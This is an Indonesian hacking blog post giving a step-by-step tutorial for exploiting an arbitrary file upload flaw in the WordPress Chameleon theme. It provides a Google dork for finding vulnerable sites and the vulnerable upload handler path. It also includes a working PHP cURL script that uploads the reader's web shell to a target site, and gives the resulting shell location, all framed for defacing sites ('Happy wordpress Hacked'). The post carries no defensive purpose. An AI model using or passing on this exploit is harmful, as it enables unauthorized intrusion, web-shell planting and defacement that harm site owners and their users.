Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw
baru ketemu lagi >.< maaf efek lebaran + liburan... *lupa ngeBlog xixihi
kali ini Nue akan share Exploit WP Chameleon theme Arbitary File Upload, etthoo,, ini exploit lama loh ..
hahaha iseng2 aja share kali aja masih
bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )
langsung aja intip tutornya
Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/cameleon/
2).Jika Ketemu Masukan Exploit
/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}
4).Buat File Baru Berekstensi .php Contoh cameleon.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn cameleon.php tadi :D
<?php
$uploadfile="namashellsobat.php";
$ch = curl_init("http://targetsobat.co.li/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5).Aktifkan XAMPP Klik Start Pada Apache
6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik:
cd C:/xampp/php
php cameleon.php
jika berhasil akan muncul tulisan success;true dan letak shell sobat..
Shell Akses: /wp-content/uploads/tahun/bulan/namashell.php
done
Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
- Google Drive
- sharebeast
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy wordpress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: irfansyahputra Blog
./Nuenomaru
Visit and follow :
EmoticonEmoticon